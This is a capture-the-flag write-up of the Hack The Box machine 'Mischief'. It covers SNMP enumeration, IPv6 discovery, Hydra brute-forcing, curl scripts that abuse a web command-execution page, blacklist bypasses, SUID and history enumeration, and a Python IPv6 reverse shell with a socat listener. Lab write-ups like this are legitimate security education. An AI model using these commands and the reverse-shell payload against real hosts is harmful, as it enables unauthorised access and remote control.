Hello people,
First writeup for an Insane box! Learned tons from this machine!
So many strong basic enumeration techniques that are crucial to creating a strong methodology can be used.
Such an extent that the box feels easy at parts just by enumerating tightly.
There is a cool combo with two wee scripts by 0xdf, they can be used to enumerate and execute bash commands on a REC vector, they are very fun and great for creating a foundation for your future scripts and improving recon in general.
I also used a few tricks from GatoGamer1155, this guy makes some of the best content in the Hispano-American scene.
And tons of documentation about SNMP, understanding deeply the way this protocol is used and the way its components communicate is crucial.
The importance of MIBs is such that you have to have their packages downloaded on every setup by default.
SNMP Agent's architecture patterns, with tons of documentation to enumerate all their daemons.
The nature that this protocol has to behave as a proxy between ipv4 and ipv6 interfaces.
The SNMP version is v2c
on this box while the latest version is v3
. The latter has an improved way of authentication thanks to a slightly improved encryption, but we are not worried about that here.
Very good machine to recommend if someone would ask for the best first insane machine to start for me so far.
After starting like always by creating a directory to work on the machine and running the first nmap
scan.
Just port 22
and port 3366
running HTTP
We can take a look at port 3366
. But there barely are records, something on adminsub
The screen just prints some Trojan reports from the past. The HTTP
is running a login page on a HTTPcurlSimpleHTTPServer
Curl
to check its response
curl -s -k -v -i 10.10.10.92:3366
It's asking for authentication, the response is in plain text. Mr Python radical calendar and contacts server
. Seems like it's a sort kind of office device. Based on a contact list for login sessions, calendar for scheduled tasks and days of the week.
Must be managed somehow. Maybe it is from a different interface or a missing protocol, let's check for UDP
activity
sudo nmap -sU --top-ports 100 -T5 -v -n -Pn 10.10.10.92
Port 161
is open runnig UDP
#Look closely
sudo nmap -sU -p 161 -sC 10.10.10.92
Loki is hosting the show, UDP
is leaking, and the HTTP server
is leaking too. A process with id 757
shows the password in plaintext in front of us.
Can we get a webshell?
An Apache
process is running also without any known ports, maybe locally for an internal network?
We can even see systemd PID
Let's login with the credentials we got
More credentials, same user name, different passwords. I can't ssh
in.
Passwords are for login, logins are sessions, and sessions run on services.
I can see even the systemd
from the machine, I know is also hosting an Apache
server.
Maybe internally or they may be using a different interface.
SNMP
is an interesting protocol, if we want to enumerate it properly, we need to understand how it works.
Look at it's components
Ask Chatgpt
SNMP Agents
, Software Agents or processes running on network devices, expose information about the device's status, configuration, and performance. Data is organised according to the structure defined inMIBs
SNMP managers
, systems or applications used for network management, sendSNMP
requests toSNMP Agents
to retrieve information or perform actions on network devices.MIBs
are used as a reference by bothSNMP managers and agents
to ensure that they understand the structure and meaning of the data being exchanged. Making the information human-readable.MIBs
provide a standardized way to represent and describe the information that can be managed usingSNMP
.
They communicate using SNMP messages
By looking at the wiki it doesn't seem like we are dealing with SNMP v3
MIB
packets help to make more efficient SNMP
enumeration. You can request specific information from devices rather than retrieving entire tables of data, which reduces unnecessary network traffic. Instead of guessing OIDs
or conducting exhaustive scans, you can refer to MIBs
to understand the structure and hierarchy of managed objects, making enumeration more precise and targeted.
MIBs
make SNMP data
human-readable and provides commands to manage agents.
Download the packages and comment MIBs
from the SNMP
config file
sudo apt install snmp-mibs-downloader
Worth reading Hacktrick's article about SNMP
pen-testing and extra documentation about MIBs
#Big chunk
snmpwalk -v 2c -c public 10.10.10.92
#Process
snmpbulkwalk -v2c -c public 10.10.10.92 hrSWRunName
#Within the process
snmpbulkwalk -v2c -c public 10.10.10.92 hrSWRunTable | grep <PID>
#Interfaces
snmpbulkwalk -v2c -c public 10.10.10.92 ipAddressType
There is an ipv6
interface right there
We can find more documentation about SNMP AGENTS
acting like proxies between ipv4
and ipv6
There are plenty of references to this proxy feature
They are also mentioned on the wiki for Software Agents
From the snmpbulkwalk
scan
Seems like there is ipv6
address if we delete the extra :
"de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:34:6c"
#Delete the extra :
"dead:beef::250:56ff:feb9:346c"
Running nmap
for ipv6
we got port 22
and 80
open
Add it to /etc/hosts
or use [ipv6]
it's up to you and check the HTTP server
Cant use the credentials that we got ---> loki:trickeryanddeceit
But I can bruteforce with Hydra
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P passwords.txt mischief.htb http-post-form "/login.php:user=^USER^&password=^PASS^:Sorry"
There is a match for administrator
We can have command execution but some processes are blacklisted, and the word "credentials" is also blacklisted.
0xdf did a cool script to enumerate the processes that are not blacklisted using curl
#/bin/bash
command_file=$1
for cmd in $(cat ${command_file}); do
curl -s -6 -X POST "http://[IPV6]:80/" -H "Cookie: PHPSESSID=IDNUM" -d "command=${cmd}" | grep -q "Command is not allowed."
if [ $? -eq 1 ]; then
echo -e " \e[42m${cmd}\e[49m allowed";
else
echo -e " \e[41m${cmd}\e[49m blocked";
fi;
done
#By 0xdf
#Create a list with the commands you want to test and give as argument
By creating a list we can enumerate what is allowed by the application
Now we can use his second script to execute commands, these two scrips are very good for further modifications depending on the situation and make a really good combo
#!/bin/bash
ip=$1
cmd=$2
curl -s -6 -X POST "http://[${ip}]:80/" -d "command=${cmd};" | grep -F "</html>" -A 10 | grep -vF -e "</html>" -e "Command was executed succesfully!"
0xdf uses a wildcard character ?
to bypass the filename being blacklisted and still read the file by using the actual filename inside “”
when doing curl
GatoGamer1155 use a similar technique but with *
directly on the web shell
Simple cool tricks that we can do after having done a strong enumeration
Dope, this way we can ssh
in as Loki and get the user flag
Every time you want to escalate your privileges, build a good habit of running commands to enumerate files and permissions
#SUID
find / -perm -4000 -type f 2>/dev/null
#Passwords
grep -iR "pass" *
grep -r "password" .
In this case, looking at the SUIDs
we can find multiple vectors that could be exploited.
pkxec
can be used to pwnkit
. And probably more if you dig binaries at GTFO
The Python server keeps leaking passwords this time on the bash history
You could use history
command itself and you would see the password close to free -mt
Good practice to always check the bash history
Another simple way to keep enumerating binaries is by using getfacl
We can use the previous script from 0xdf to enumerate su
and sudo
on the web shell
Green light means we should be rooting with the password leaked
We just need to get the web shell first, shouldn't be too hard to get a reverse shell.
Make sure you have a proper setup to set listeners on IPv6
You can try by having netcat-openbsd
configured properly or just by using socat
which provided an easier way to listen IPv6
from the get-go
socat TCP6-LISTEN:1234,bind=::,fork -
Craft the payload easily by grabbing an IPv6
Python reverse shell. You can have a look at a revshell and change AF_INET
for AF_INET6
and adding ;
at the end
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("IPV6",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
#Add your IPV6 and port and remenber adding ; at the end
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::1010",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Execute
The flag is not around but we can enumerate files like Champs
find / -name root.txt 2>/dev/null